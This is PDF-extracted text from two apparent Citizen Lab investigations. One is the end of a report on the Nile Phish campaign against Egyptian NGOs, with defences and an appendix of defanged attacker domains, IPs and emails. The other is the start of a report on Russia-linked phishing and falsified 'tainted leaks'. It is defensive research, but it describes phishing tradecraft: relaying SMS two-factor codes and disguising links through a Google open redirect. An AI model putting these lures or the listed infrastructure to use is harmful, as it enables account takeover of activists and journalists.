use much less advanced technology. The recent case of an iOS zero day used against UAE and Mexican civil society represents a relatively
sophisticated and expensive attack vector. While such an operation is costly and relatively difficult to detect, many operations that we have
observed at the Citizen Lab use much less sophisticated technical means.
In this report we described how the Nile Phish operators used targeted, timely, and clever deceptions combined with an open-source phishing
framework.
Why Do Many Threat Actors Still Use Credential Phishing?
While we cannot know Nile Phish operators
reasons for choosing phishing, assuming they have access to other techniques, we can
speculate that they used social engineering because it works. A phishing campaign has a number of advantages, even for operators capable
of obtaining expensive and sophisticated malware. Indeed, even in cases where the same operators may also possess and deploy malware.
As an exercise, the following table emphasizes some of the advantages of phishing as a technique to gain access to private communications
when used by a well resourced actor. The table highlights some of the reasons why such actors may continue to use phishing.
Credential Phishing: Why it keeps being used as a surveillance tool
Concern
Credential Phishing
Cost / Skill
Zero or near-zero development cost. Can be deployed with little or no technical skills.
Scalability
High. Easily deployed against dozens, thousands, or more targets.
Adaptability
High. Domains and emails can be quickly modified if a particular approach is not working.
Risk of
burning
expensive
tools and
methods
Low. Phishing can be conducted using free and open-source toolkits. Discovery does not result in the compromise of
special technical tools, costly exploits, or malware
Attribution
Debateable. Like the use of Commercial-Off-The-Shelf (COTS) malware, phishing does not instantly point to a particular
type of actor, such as a government, as many malicious actors use this technique. Discovery of a tool like NSO Group
Pegasus or Hacking Team
s Remote Control System, on the other hand, strongly implies state involvement, as they are
marketed for lawful intercept purposes and the cost of procuring those tools precludes those without significant resources
from acquiring them. Moreover, finding phishing may not alert the target that a sophisticated attacker is present.
Diverse
target
environment
Phishing does not require knowledge of a target
s devices, antivirus, or other endpoint security features. Nor does it
require a means to bypass these, such as an exploit, in order to gain access to targeted communications.
Gathering
relevant
data
Email and online accounts often contain huge troves of data which, when compromised, can quickly be siphoned out of
accounts remotely.
In using phishing, Nile Phish operators are far from alone. Citizen Lab reports have repeatedly pointed out that many operators, including
those with access to more sophisticated technologies, persist in phishing and other forms of basic social engineering.
For example, in South America, the Packrat group, which was active against civil society in several countries, made use of credential phishing
as part of its multi-year campaign. Similarly, operations targeting the Tibetan diaspora have also made use of phishing, as have operations
targeting the Syrian opposition, Iranian pro-democracy organizations, and many others.
Cheap Ways to Make Phishing NGOs Harder
Civil society groups make widespread use of cloud email services, file sharing and collaboration tools. These services are exceptionally
helpful to organizations that do not have the resources to maintain or secure self-hosted deployments. Many of these cloud services have
powerful security features, like 2-factor authentication, that are capable of blunting the impact of straightforward credential phishing. However,
9/14
most of these security features are not enabled by default, whether for individual users of cloud services, or for organizations. The absence of
default-on security features predictably leads to a lower rate of use, and keeps the door open for phishing.
What is Two Factor Authentication? Two Factor Authentication has many names, like 2 Step Authentication, Login Approvals, 2FA, and so
on, but they typically refer to the same thing: combining a password with a second
factor
that only the authorized user has. Most commonly
this is a text message sent to the user
s phone. Other versions include physical tokens, code generators, authenticator apps or prompts on
devices, and so on.
Click here for a list of services that support Two Factor Authentication.
From the perspective of an NGO however, several approaches are available to increase the cost of phishing, including using more secure
forms of 2 Factor Authentication. As a next-level step, organizations can also implement phishing / social engineering awareness exercises.
Increase the Cost to Phish an NGO
Anti-Phishing
Technique
Works on
Limitations
2 Factor
Authentication
with
Authenticator
Apps or
Yubikeys
Account security, means
that even if credentials are
phished a second factor is
still required.
2 Factor Authentication can still be phished in some circumstances, such as tricking
victims into entering codes from authenticator apps, although deceptions must be
more elaborate. Does not protect against some malware attacks that steal two factor
codes from devices.
Phishing
Training
Human behavior,
increasing the likelihood
that phishing is noticed.
Can be time consuming, and requires organizational buy-in. While free tools like Duo
Insight are available, other solutions can be expensive.
Using Secure 2 Factor Authentication
The most common form of 2 Factor authentication is to receive SMS messages. Although a growing number of threat actors are
experimenting with phishing 2 Factor credentials, and tampering with SMS-based authentication, including in Egypt, when implemented
securely the feature is a low-cost way to dramatically increase the cost-to-phish.
One way to increase the security of 2 Factor authentication is to move away from SMS-based authentication to Authenticator Apps or, even
more secure, Yubikeys. Both Google and, most recently Facebook, now support Yubikeys for authentication.
Next Level: Behavioral Training
Phishing exploits vulnerabilities that will always be present in human behavior. When a phishing campaign like Nile Phish targets an
organization, the operators do not expect that everyone will be duped. One compromise is enough to begin siphoning private data, and to start
using that data to construct more convincing phishing or malware attacks against others in an organization.
There is a growing consensus that repeated training with mock-phishing exercises, in the form of realistic phishing e-mails sent by the
organization
s IT staff, can be an effective way to build an organization
human firewall.
There are a number of free tools that NGOs can use
to conduct these exercises, including Duo Insight. Ironically, Gophish is another such tool, although it requires slightly more technical
sophistication to implement. Many other solutions are available, many of them commercial. While not every organization will be able to
implement behavioral training, it is a free and highly effective strategy for reducing institutional exposure to phishing attacks and social
engineering.
What Technology Companies Can Do Right Now
Major online companies have been reluctant to add 2 Factor Authentication as a default for new account creation. Keeping 2 Factor an opt-in
security feature, rather than opt-out means that most users will not enable it. No exact numbers are publicly available about 2 Factor adoption
rates, but if it looks like other opt-in choices (e.g. seat belts before being made mandatory), it is unlikely to be adopted by a majority of users.
While there are trade-offs to enabling 2 factor as a default (e.g. costs to account recovery and friction in user experience), reports like this
one make it clear that credential phishing will continue to be widely practiced by a range of threat actors against some of the most vulnerable
user groups.
Conclusion: Nile Phish is yet another threat to Egypt
s Civil Society
Egyptian NGOs have faced a sprawling legal case that is in its fifth year. The case has resulted in arrests, travel bans, asset freezes, and
10/14
prison sentences. Almost all of the 92 phishing emails we have identified were sent to individuals implicated in Case 173, either as named
defendants, or staff of targeted NGOs.
We do not attribute Nile Phish to a sponsor in this report, but it is clear that it is yet another component of the increasingly intense pressure
faced by Egyptian civil society. By exposing the Nile Phish operation, including providing more technical indicators, we hope to help potential
targets and other investigators identify and mitigate the campaign.
Evidence of 2 Factor Phishing
Since publication, Citizen Lab and EIPR have been contacted by a number of additional targets. These targets provided us with a range of
evidence for additional activities by Nile Phish. Importantly, it also appears that Nile Phish has engaged in phishing users of 2 factor
authentication. The following illustration describes this process.
11/14
Diagram explaining how Nile Phish operators phish users who have enabled 2 factor authentication. [Click for hi res]
The phishing works in this case by tricking the victim into entering both their password and their two factor code. First, the victim is phished by
Nile Phish using a deception similar to those described in the report. If the victim is tricked into providing their password, Nile Phish sends the
victim a message with a link to a 2-factor code phishing page, then the operators type the stolen password into Gmail. They then request
SMS as an Alternative Verification method. Gmail then sends the victim an SMS with a six digit code. If the victim enters the SMS into the
12/14
code phishing page, the operators use the code to log into gmail to take control of the account.
Acknowledgements
Very special thanks to Citizen Lab colleagues including Ron Deibert, Claudio Guarnieri, Sarah McKune, Ned Moran, Masashi Crete-Nishihata,
Irene Poetranto, Adam Senft, and Amitpal Singh.
Citizen Lab also thanks T. Nebula, unnamed security researchers, TNG, and Internews.
Appendix A Indicators of Targeting
Download the indicators from the Citizen Lab Github.
The operators used at least 33 domains for this phishing attack, the following table provides examples.
Theme
Example Domain
Google
googledrive-sign.servehttp[.]com, googledriver-sign.ddns[.]net, mailgooglesign.servehttp[.]com, googlemaps.servehttp[.]com, account-google.serveftp[.]com, googleverify-signin.servehttp[.]com, googlesecureserv.servehttp[.]com, googlesignin.servehttp[.]com, activate-google.servehttp[.]com, googlemaps.servehttp[.]com
Dropbox
dropboxsupport.servehttp[.]com, dropbox-service.serveftp[.]com, dropbox-sign.servehttp[.]com
Generic
verification-acc.servehttp[.]com, secure-team.servehttp[.]com, security-myaccount.servehttp[.]com,
myaccount.servehttp[.]com, device-activation.servehttp[.]com
Shipping
fedex-shipping.servehttp[.]com, fedex-mail.servehttp[.]com, fedex-sign.servehttp[.]com, aramex-shipping.servehttp[.]com
Full list of Domains
account-google.serveftp[.]com
aramex-shipping.servehttp[.]com
device-activation.servehttp[.]com
dropbox-service.serveftp[.]com
dropbox-sign.servehttp[.]com
dropboxsupport.servehttp[.]com
fedex-mail.servehttp[.]com
fedex-shipping.servehttp[.]com
fedex-sign.servehttp[.]com
googledriver-sign.ddns[.]net
googledrive-sign.servehttp[.]com
google-maps.servehttp[.]com
googlesecure-serv.servehttp[.]com
googlesignin.servehttp[.]com
googleverify-signin.servehttp[.]com
mailgooglesign.servehttp[.]com
myaccount.servehttp[.]com
secure-team.servehttp[.]com
security-myaccount.servehttp[.]com
verification-acc.servehttp[.]com
dropbox-verfy.servehttp[.]com
fedex-s.servehttp[.]com
watchyoutube.servehttp[.]com
verification-team.servehttp[.]com
securityteam-notify.servehttp[.]com
secure-alert.servehttp[.]com
quota-notification.servehttp[.]com
notification-team.servehttp[.]com
fedex-notification.servehttp[.]com
docs-mails.servehttp[.]com
restricted-videos.servehttp[.]com
dropboxnotification.servehttp[.]com
13/14
moi-gov.serveftp[.]com
activate-google.servehttp[.]com
googlemaps.servehttp[.]com
108.61.176[.]96
104.238.191[.]204
176.123.26[.]42
Emails
secure.policy.check[@]gmail.com
aramex.shipment[@]gmail.com
fedex_tracking[@]outlook.sa
mails.acc.noreply[@]gmail.com
fedex.noreply[@]gmail.com
customerserviceonlineteam[@]gmail.com
fedexcustomers.service[@]gmail.com
elnadeem.org[@]gmail.com
dropbox.noreplay[@]gmail.com
mails.noreply.verify[@]gmail.com
fedex.mails.shipping[@]gmail.com
dropbox.notifications.mails[@]gmail.com
dropbox.notfication[@]gmail.com
drive.noreply.mail[@]gmail.com
14/14
Tainted Leaks Disinformation and Phishing With a Russian
Nexus
citizenlab.ca/2017/05/tainted-leaks-disinformation-phish/
May 25, 2017
Every external operation is first and foremost a domestic one: the single most important role of
the agencies is to secure the regime.
Mark Galeotti on Russian foreign intelligence
Key Points
Documents stolen from a prominent journalist and critic of the Russian government were
manipulated and then released as a
leak
to discredit domestic and foreign critics of the
government. We call this technique
tainted leaks.
The operation against the journalist led us to the discovery of a larger phishing
operation, with over 200 unique targets spanning 39 countries (including members of 28
governments). The list includes a former Russian Prime Minister, members of cabinets
from Europe and Eurasia, ambassadors, high ranking military officers, CEOs of energy
companies, and members of civil society.
After government targets, the second largest set (21%) are members of civil society
including academics, activists, journalists, and representatives of non-governmental
organizations.
We have no conclusive evidence that links these operations to a particular Russian
government agency; however, there is clear overlap between our evidence and that
presented by numerous industry and government reports concerning Russian-affiliated
threat actors.
Summary
This report describes an extensive Russia-linked phishing and disinformation campaign. It
provides evidence of how documents stolen from a prominent journalist and critic of Russia
was tampered with and then
leaked
to achieve specific propaganda aims. We name this
technique
tainted leaks.
The report illustrates how the twin strategies of phishing and tainted
leaks are sometimes used in combination to infiltrate civil society targets, and to seed mistrust
and disinformation. It also illustrates how domestic considerations, specifically concerns about
regime security, can motivate espionage operations, particularly those targeting civil society.
The report is organized into four parts described below:
1/43
PART 1: HOW TAINTED LEAKS ARE MADE describes a successful phishing campaign
against David Satter, a high-profile journalist. We demonstrate how material obtained during
this campaign was selectively released with falsifications to achieve propaganda aims. We
then highlight a similar case stemming from an operation against an international grantmaking
foundation, headquartered in the United States, in which their internal documents were
selectively released with modifications to achieve a disinformation end. These
tainted leaks
were demonstrated by comparing original documents and emails with what Russia-linked
groups later published. We conclude that the tainting likely has roots in Russian domestic
policy concerns, particularly around offsetting and discrediting what are perceived as
outside
foreign
attempts to destabilize or undermine the Putin regime.
PART 2: A TINY DISCOVERY describes how the operation against Satter led us to the
discovery of a larger phishing operation, with over 200 unique targets. We identified these
targets by investigating links created by the operators using the Tiny.cc link shortening service.
After highlighting the similarities between this campaign and those documented by previous
research, we round out the picture on Russia-linked operations by showing how related
campaigns that attracted recent media attention for operations during the 2016 United States
presidential election also targeted journalists, opposition groups, and civil society.
PART 3: CONNECTIONS TO PUBLICLY REPORTED OPERATIONS outlines the
connections between the campaigns we have documented and previous public reporting on
Russia-linked operations. After describing overlaps among various technical indicators, we
discuss the nuance and challenges surrounding attribution in relation to operations with a
Russian nexus.
PART 4: DISCUSSION explores how phishing operations combined with tainted leaks were
paired to monitor, seed disinformation, and erode trust within civil society. We discuss the
implications of leak tainting and highlight how it poses unique and difficult threats to civil
society. We then address the often-overlooked civil society component of nation-state cyber
espionage operations.
Introduction: Tainted Leaks & Civil Society Targets
Russia-linked cyber espionage campaigns, particularly those involving targeting around the
2016 U.S. elections, and more recently the 2017 French election, have dominated the media in
recent months. As serious as these events are, often overlooked in both media and industry
reports on cyber espionage is a critical and persistent victim group: global civil society.
A healthy, fully-functioning, and vibrant civil society is the antithesis of non-democratic rule,
and as a consequence, powerful elites threatened by their actions routinely direct their
powerful spying apparatuses toward civil society to infiltrate, anticipate, and even neutralize
their activities. Unlike industry and government, however, civil society groups typically lack
resources, institutional depth, and capacity to deal with these assaults. For different reasons,
they also rarely factor into threat industry reporting or government policy around cyber
espionage, and can be the silent, overlooked victims.
2/43
As with previous Citizen Lab reports, this report provides further evidence of the
silent
epidemic
of targeted digital attacks on civil society, in this case involving widely reported
Russian-affiliated cyber espionage operations. Our report underscores the domestic roots of
these foreign operations, and how concerns over regime security and domestic legitimacy can
factor into Russian threat modeling and espionage targeting, both at home and abroad.
Patient Zero for the Investigation: David Satter
Our investigation began with a single victim: David Satter, a high-profile journalist, Rhodes
Scholar, and critic of the Kremlin. In 2013, Satter was banned from Russia, allegedly for
flagrant violations
of visa laws, but which most attribute to his investigative reporting on
Russian autocracy. Satter is known for his book, Darkness at Dawn, which investigated the
possible 1999 conspiracy involving the Russian Federal Security Service (FSB) in a series of
bombings of Russian apartment buildings that was used as a justification for the second
Chechen War and which facilitated the rise to power of Vladimir Putin.
On October 7, 2016 Satter fell victim to a targeted phishing campaign, and mistakenly entered
his password on a credential harvesting site. Satter
s e-mails were stolen and later published
selectively, and with intentional falsifications, as we will describe in this report. While we cannot
conclusively attribute the theft of Satter
s emails to one particular threat actor, nor do we have
concrete details on the process by which his stolen emails were falsified and made their way
into the public domain, we uncover and analyze several pieces of evidence to help
contextualize the tainted leaks, while at the same time linking the infiltration of his email to a
much wider cyber espionage campaign that has a Russian nexus.
Tainted Leaks: Disinformation 2.0
Following the compromise of his account, Satter
s stolen e-mails were selectively modified,
and then
leaked
on the blog of CyberBerkut, a self-described pro-Russian hacktivist group.
This report introduces the term
tainted leaks
to describe the deliberate seeding of false
information within a larger set of authentically stolen data.
We examine in detail how a report sent to the National Endowment for Democracy (NED)
about Radio Liberty
s Russian investigative reporting project (contained in the emails stolen
from Satter) was carefully modified with false information prior to being released. We show
how this manipulation created the false appearance that prominent Russian anti-corruption
figures, including Alexei Navalny, were receiving foreign funding for their activities. (Alexei
Navalny is a well-known Russian anti-corruption activist and opposition figure). We also note
how the document was used in an effort to discredit specific reports about corruption among
close associates of Russian President Vladimir Putin.
In addition, whoever tainted the document also made reference to an article that had not yet
been published at the time the document was
leaked.
This timing strongly suggests advance
knowledge of the publication of an upcoming piece of investigative journalism concerning
3/43
senior Russian officials and businessmen. Such information is likely to have been sensitive,
and would not have been widely known. This may suggest that the operators had access to
other, ongoing surveillance operations.
Once the tainted leak was released, Russian state-owned media and others reported that the
document showed a CIA-backed conspiracy to start a
colour revolution
in Russia.1 The
tainted leak was also reported as evidence that the reports on corruption within Putin
s inner
circle represented part of a deliberate disinformation campaign on behalf of foreign interests.
The timing and substance of the tainting coincides with reported fears among Putin and his
close associates that revelations about their wealth and its sources could trigger protests and
uprisings within Russia, like those lead by Navalny in recent months and years.
Tainted leaks pose complex challenges to the victims of breaches, as well as representing a
potent and troubling method of disinformation. Part 1 describes the leak tainting in greater
detail, and Part 4: Discussion provides an analysis of the risks posed by the tactic.
Pandora
s Un-Shortening: High Value Targets Emerge
While investigating the suspicious messages sent to Satter, we determined that Tiny.cc, the
link-shortening service used by the operators to phish credentials, had predictable features
that enabled us to discover some other links likely used by the same operators. We developed
a technique to discover some of these links, and ultimately collected 223 malicious links
representing 218 unique targets.2 We have been able to identify the real identity of
approximately 85% of the targets. Of the set we identified, we found targets from at least 39
countries.
One thread that links the targets is that their professional activities connect them to issues
where the Russian government has a demonstrated interest. In some cases, the targets are
Russians, ranging from an ex-Prime Minister, to journalists who investigate corruption, to
political activists. Many more targets are from, posted to, or involved in extractive industries in
countries and areas where the Russian government has an economic and strategic interest,
such as former Soviet states. Still others are likely to be working on issues on the other side
of the negotiating table from Russia, whether as part of United Nations operations, NATO, or
civil service. Perhaps unsurprisingly, one of the largest groups of targets are high-ranking
military and government personnel and elected officials in Ukraine.
4/43
Figure 1: Map showing countries that targets of the phishing campaign are linked to [click
for hi-res]
In other cases, for instance, the wife of a military attache, individuals appear to be targeted
because of their proximity to high value targets. In others, we have identified a large number of
individuals who appear to be targeted because they received support, in the form of a
fellowship, from a particular US-based grantmaker.
Some notable target categories include:
Politicians, public servants and government officials from Afghanistan, Armenia, Austria,
Cambodia, Egypt, Georgia, Kazakhstan, Kyrgyzstan, Latvia, Peru, Russia, Slovakia,
Slovenia, Sudan, Thailand, Turkey, Ukraine, Uzbekistan and Vietnam
Diplomatic personnel from numerous embassies, up to and including ambassador level,
as well as their family members
Civil society members including very high profile critics of the Russian president, as well
as journalists and academics
Senior members of the oil, gas, mining, and finance industries of the former Soviet states
United Nations officials
Military personnel from Albania, Armenia, Azerbaijan, Georgia, Greece, Latvia,
Montenegro, Mozambique, Pakistan, Saudi Arabia, Sweden, Turkey, Ukraine, and the
United States, as well as NATO officials
5/43
The discovery of so many other targets provides us with a window into the campaign
structure, and objectives (Part 2 outlines how we discovered the targets). After government
targets, the second largest set (21%) are members of civil society like academics, activists,
journalists, and representatives of non-governmental organizations.
Figure 2: Some high-value targets
who received phishing emails
The Importance of Civil Society Targets
The data presented in Figure 3 underscore the extent to which civil society groups are being
targeted in numbers equivalent to those seen with the more classic
cyber espionage
sectoraligned targets such as military, government, and industry.
Amongst the civil society targets, more than half were journalists, many of whom are
prominent contributors to Russian language news outlets such as Vedomosti, Slon/Republic,
Novaya Gazeta, and the BBC Russian Service.
While providing a detailed analysis of the civil society targets or an outline of their areas of
activity would undoubtedly jeopardize their privacy, we can safely reflect on two notable
patterns that emerge from such an analysis.
6/43
The first is that, like our first subject David Satter, several individuals from the target list were
known for their public efforts towards shining a light on the Russian government and its
activities. From publishing articles that outline fraud or corruption, to general activism in
support of electoral reform, many of the civil society targets seem to have been singled out for
the perception that their actions could pose a threat to the Putin regime.
Figure 3: Breakdown of discovered targets into broad categories
Another notable commonality found during analysis of the civil society targets of these
campaigns is the near perfect alignment between their areas of activity and the geopolitical
conflicts in which Russia is a known or suspected belligerent, or party to the conflict.
Specifically, the focus areas of the civil society targets span geographic boundaries, including
conflict areas such as Syria, Afghanistan, Ukraine, and others.
We also found that several dozen of the targeted individuals had as a thread in common that
they had received a fellowship from a single funder focused on the region.
Notification
The large and diverse target group presented notification challenges. Our process for notifying
potential victims involved the following considerations and steps:
For targets affiliated with governments or government-affiliated organizations (such as
NATO or the United Nations), or businesses in a particular country, we passed
information on targets
names and email addresses to the relevant Computer Emergency
Response Team (CERT)
If many targets shared an organizational affiliation, but not a single employer, we
contacted that organization and worked with them to notify the individuals
7/43
We also provided a full list of targets to the targets
e-mail provider.
Part 1: How Tainted Leaks Are Made
We examine how stolen materials from Satter
s inbox were turned into tainted leaks and
released by CyberBerkut, and then examine a similar operation against the Open Society
Foundations.
To make a clean comparison between real and fake, and illustrate exactly how tainting takes
place, we obtained original, genuine documents and e-mails from David Satter, a victim of a
breach, and compared them with the tainted versions. We then describe a prior case of tainted
leaks: internal documents belonging to the Open Society Foundations were stolen, then later
released with tainting similar to Satter
s, also by CyberBerkut.3
In both cases the breach victims were working with US-based organizations which had
programs specializing in Russia. The tainting appeared to have two objectives: cause the
programs to appear more subversive of Russia than they were, and discredit specific
opposition individuals and groups critical of Russian President Putin and his confidants.
The Case of David Satter
On October 5, 2016, a phishing email was sent to the Gmail address of David Satter (See:
Patient Zero: David Satter). This phishing email was crafted with a specific ruse designed to
look like a security warning from Google, suggesting to the recipient that an unknown thirdparty has obtained their Gmail account password (see Figure 4).
8/43
Figure 4: Phishing Email 1, mimicking a genuine message from Google
The phishing email is designed to trick the recipient into clicking on the
Change Password
button. Clicking on this link would direct the victim
s web browser to a link hosted on the URL
shortening service Tiny.cc. The operator disguised the link by using an open redirect hosted by
Google. This open redirect allowed the operators to create a URL that, superficially, appears to
be hosted by Google:
https://www.google.com/amp/tiny.cc/(redacted)
Unfortunately, the ultimate destination of this shortened URL was changed to a benign
webpage before we were able to examine this phishing email. However, as we will outline in
Part 2 of this report, there is sufficient evidence available to suggest the original destination.
Analysis of the email headers revealed that the message was sent with the Russian email
service Yandex, using email account g.mail2017[@]yandex.com.
A Second Phishing Email
Two days later, on October 7, 2016, Satter received a second email that used an identical
deception to the first attempt detailed above.
9/43
As with Email 1, the google.com/amp/ redirect pointed to a URL hosted by Tiny.cc. Once
again, similar to Email 1, Citizen Lab found that the originally configured redirection target for
this link had been removed.
Analysis of the email headers in this second phishing attempt show that the message was sent
with the web-based email service
mail.com
, using email account annaablony[@]mail.com.
Figure 5: Phishing Email 2
Unauthorized Access
On October 7 2016, shortly after receiving the email, Satter reports having clicked on the
change password link in Email 2, and recalls being redirected to what he now realizes was in
fact a credential phishing page which appeared to be a legitimate Google sign-in page.
Unfortunately, Satter had temporarily disabled 2-factor authentication on his account, making
the compromise possible.
Shortly after entering his credentials, Satter
s Gmail account activity page recorded an
unauthorized login event. The data logged by Google indicated that the login session
originated from an IP address in Romania (Figure 6). In Part 2 we will show that the server
associated with this IP address was also hosting the fake Google login page where Satter
submitted his account credentials. Thus it is likely that this malicious server was configured to
automatically download the email contents from any compromised accounts (see Figure 7).
10/43
Figure 6: Screen grab from Google
account activity page
In Part 2 of this report we will outline how the
phishing links sent to Satter led us to discover
a much wider campaign that included 218
distinct targets from government, industry,
military, and civil society. In the following section, we provide context concerning the
disinformation campaign that was conducted around material stolen from Satter
s email
account and published on the blog of CyberBerkut, a pro-Russian hacktivist collective.
Figure 7: How a phishing campaign against Satter became a tainted leaks operation
Analyzing a Tainted Leak
This section compares an original document obtained by Citizen Lab with a tainted document
published online, and used as part of a disinformation campaign. We describe the tainting in
detail, and analyse the likely objective.
Several documents from Satter
s emails were posted by CyberBerkut at the same time without
observable manipulation. However, one document showed extensive evidence of tainting. The
tainted leak was a report authored by Satter describing Radio Liberty
s Russian Investigative
Reporting Project. The document was modified to make Satter appear to be paying Russian
journalists and anti-corruption activists to write stories critical of the Russian Government.
Importantly, we do not know the process through which the stolen document made its way
from Satter
s inbox to the CyberBerkut release. In the CyberBerkut version, the document is
posted as screen-captures, and thus lacks metadata.
11/43
Figure 8: CyberBerkut post dated October 22, 2016 showing the narrative
accompanying the tainted leak document (highlighted with arrow). [Archived copy]
The original document lists a series of articles from Radio Liberty exclusively that are part of
the project. The articles concern a range of topics: history, economics, and politics. Radio
Liberty is a U.S. government international broadcaster, founded in 1951 to broadcast news and
information into the Soviet Union. It merged with Radio Free Europe in 1976, who now
together are incorporated as a 501(c)(3), funded and overseen by the United States
Broadcasting Board of Governors.
The tainted document modifies the text to appear to be a report on a much larger (nonexistant)
project to pay for articles by a range of authors, which would subsequently be published by a
range of media outlets. The deceptively inserted articles, almost all of which are genuine
publications, focus on corruption within Putin
s friends and inner circle. The work of Alexei
Navalny, a prominent Putin critic, is repeatedly emphasized. The full tainted document is in
Appendix A.
Taint 1: Making reporting look like a secret influence operation
The operators modified the document
s scope in an attempt to create the appearance of a
widespread media campaign. They did this by removing or modifying mentions of Radio Liberty
throughout the document.
Figure 9: Text in red was removed, creating the impression of a wide media campaign,
not the programming of a specific news source.
Other content, such as discussions of specific translators working for Radio Liberty are
similarly removed to preserve the fiction.
12/43
Figure 10: The document was further tweaked to create the impression of a larger
campaign. A note about a translator was also removed as it would contradict the
impression
We believe that by removing specific references to Radio Liberty, the perpetrators are aiming
to give the impression of a broader subversive campaign not limited to a single news
organization. Doing so allows the perpetrators to falsely associate non-US funded
organizations, such as independent NGOs, to appear to be linked as part of this larger,
fictitious program.
Figure 11: Further tainting to remove mentions of Radio Liberty
Finally, a clause is deleted at the end of the document concerning the risks of writing
without
the protection of a full time job
(Figure 11). This deletion may simply be the tainters removing
an inconvenient sentence that refers to Radio Liberty, but it also may be an attempt to make
the activity look more
cloak and dagger.
Taint 2: Discrediting specific journalists and Kremlin critics
The original document included a list of 14 articles published as part of the Russian
Investigative Project at Radio Liberty. The tainted document includes 24. The operators not
only added to the list, but also tweaked the Radio Liberty articles to further the impression of a
larger campaign.
13/43
Figure 12: Six of the ten added articles. All blue text was added to the original as part of
the tainting. The objective is to make these reports appear to have been supported by
the project.
Ten additional articles were added. Although the original list of publications covered a
variety of themes, the added set primarily focuses on issues of corruption, and the wealth of
those in Putin
s circle. The articles, written for a range of publications, all share a theme:
corruption and personal enrichment by those close to Putin and the Russian Government (See
Appendix A).
14/43
Figure 13: People and Topics of articles added in the tainting. Images: Wikipedia, Radio
Free Europe, Reuters [click for hi-res]
Of special interest are the insertions of Alexei Navalny, a prominent Russian anti-corruption
activist and opposition figure whose work, and Anti-corruption Foundation, receives
widespread domestic and international attention. By repeatedly adding his reporting to the
document, the tainting creates the appearance of
foreign
funding for his work. This theme
also figured prominently in the disinformation campaign surrounding the original publication, on
October 22, 2016, of the tainted document by CyberBerkut (See: Disinformation Campaign
Surrounding the Tainted Document).
Taint 3: Claimed foreknowledge
An article by Russian journalist Elena Vinogradova describing issues involving
senior Russian
officials and businessmen
was also added as part of the tainting, which goes on to state that
it will be published by Russian-language news service Vedomosti on October 24-25.4
Figure 14: Tainting that suggests the operators had advanced knowledge of a news
report
15/43
This timing is significant as the original CyberBerkut publication of the tainted document
occurred on October 22 2016, slightly before this date.
The apparent foreknowledge suggests that the individuals responsible for the tainting had
advance knowledge of the content and publication date of a piece of investigative journalism,
which may mean the operators had access to intelligence or surveillance reports concerning
the activities of the Elena Vinogradova.
We identified at least one individual among the set of targets of the phishing campaign whose
account might have provided this information, however we were not able to confirm a
compromise.
Importantly, we were not able to find concrete evidence of the publication of an article
matching the description added in the tainting. It is possible that existence of the article was a
fabrication, or the result of misplaced speculation by the individuals responsible for the
tainting.
Taint 4: Modifying the Time Frame and Supporting Details
The timeframe and number of publications are increased, perhaps to give the impression of a
longer and more intense campaign. Changes are also made to accommodate a wide range of
articles not published by Radio Liberty but by other parties.
Figure 15: Dates and numbers changed to accommodate ten more articles
Text that mentions specific dates in the original document that would not accommodate the
articles that have been falsely added is also changed to support the new fiction.
Disinformation Campaign Surrounding the Tainted Document
The tainted version of the stolen document was released online by CyberBerkut, which
represents itself as a group of pro-Russian hacktivists. CyberBerkut provided the framing
narrative for the tainted document in a post on October 22, 2016: they were releasing the
document to provide evidence that the United States was attempting to support a
colour
revolution
in Russia. In the CyberBerkut narrative, David Satter was an agent directing the
publication of articles critical of the Russian government.
16/43
Figure 16: RIA Novosti, Russia
s state operated news agency, reporting the Cyber
Berkut
s release of the tainted leaks
Russia
s state operated news agency RIA Novosti, as well as Sputnik Radio, picked up the
narrative, and gave voice to a number of sources who claimed that the
leak
was evidence
that the United States Central Intelligence Agency (CIA) was attempting to foment a
colour
revolution.
The document was cited in a RIA Novosti report as providing evidence of
over
reports intended to discredit the Russian president, and his entourage. The
colour
revolution
narrative was echoed in this SM News report, and by Vesti.lv, among others.
Meanwhile, other Russian-language sources claimed that the document discredited Navalny
Anti-corruption Foundation by showing that its articles were actually ordered by David Satter.
The Open Society Foundations Case
In 2015, the Open Society Foundations (OSF) experienced a breach of confidential data.
17/43
Materials from this breach were released by CyberBerkut in November 2015 and, much later,
on the
leak
branded site DC Leaks, alongside a wide range of materials stolen from other
organizations. DC Leaks worked directly with some online outlets, and provided exclusive
access to their materials to some, as well as achieving substantial media impact.
The redundant releases enable a comparison of documents between the two leaks using
public materials. The DC Leaks dump included the release of untainted stolen documents that
had been previously released as part of a tainted leak by Cyber Berkut. An article in Foreign
Policy used this dump to identify several cases of leak tainting. We were able to verify each of
their observations, as well as identifying additional elements of tainting.
We then contacted OSF
s IT staff, who provided us with the original genuine documents which
we were able to use as the basis for further comparisons, and to authenticate the documents
posted on DC Leaks. Taken together, the tainting appears designed to create the impression
that several groups and media outlets, including Alexei Navalny
s Foundation for Fighting
Corruption, are supported by OSF.
As with the Satter case, the tainting appears to have a primarily domestic focus, and to be
aimed at de-legitimizing figures like Navalny by making it appear that they are the recipients of
illicit, foreign funding. This is a view that Navalny, one of the targets of the tainting, has also
expressed to Foreign Policy.
A Budget Document
First, CyberBerkut released a tainted budget document to make it appear as if OSF was
funding Alexei Navalny
s Foundation for Fighting Corruption.
Figure 17: Tainted Budget Document: the second row was added to make it appear as if
OSF was funding Navalny
s Foundation for Fighting Corruption
The tainters may have been working quickly, resulting in a small error, in which a dollar amount
was substituted for
Approved Date.
Proposed Strategy Document
Second, a proposed funding strategy document was similarly modified to include the
Foundation for Fighting Corruption in a list of groups to receive OSF support.
18/43
Figure 18: Proposed Strategy Document showing the location where the tainted
document is modified to include mention of the Foundation for Fighting Corruption
The tainting resumed later in the document, when several media outlets (Echo Moscow,
RosBusinessConsulting, and Vedomosti) were also added to the document, apparently to
create the perception that they had received the support of OSF.
Figure 19: A second section in the same document showing once more how several
media outlets, including Echo Moscow, RosBusinessConsulting, and Vedomosti have
been added.
The second instance of tainting in the strategy document also introduced a slight grammatical
error when the tainters neglected to remove
before changing
news site
to the plural
news sites.
Document Addressing the NGO Law
Finally, in a document addressing grantees and Russia
s NGO law, tainting was again
performed to add Navalny
s Foundation for Fighting Corruption. The tainting also purported to
show the foundation receiving money via Yandex, a widely-used Russian platform offering an
online payment service.
19/43
Figure 20: Tainted document, once more showing the addition of Navalny
s Foundation
for Fighting Corruption
Taken together, both the tainted document stolen from David Satter, and the tainted OSF
documents paint a picture of a competent adversary working to achieve several objectives,
including discrediting domestic critics of Russia
s government and president, while
simultaneously attempting to embarrass foreign funders with activities in Russia. In Part 4 we
discuss the significance of tainted leaks as a disinformation technique.
Part 2: A Tiny Discovery
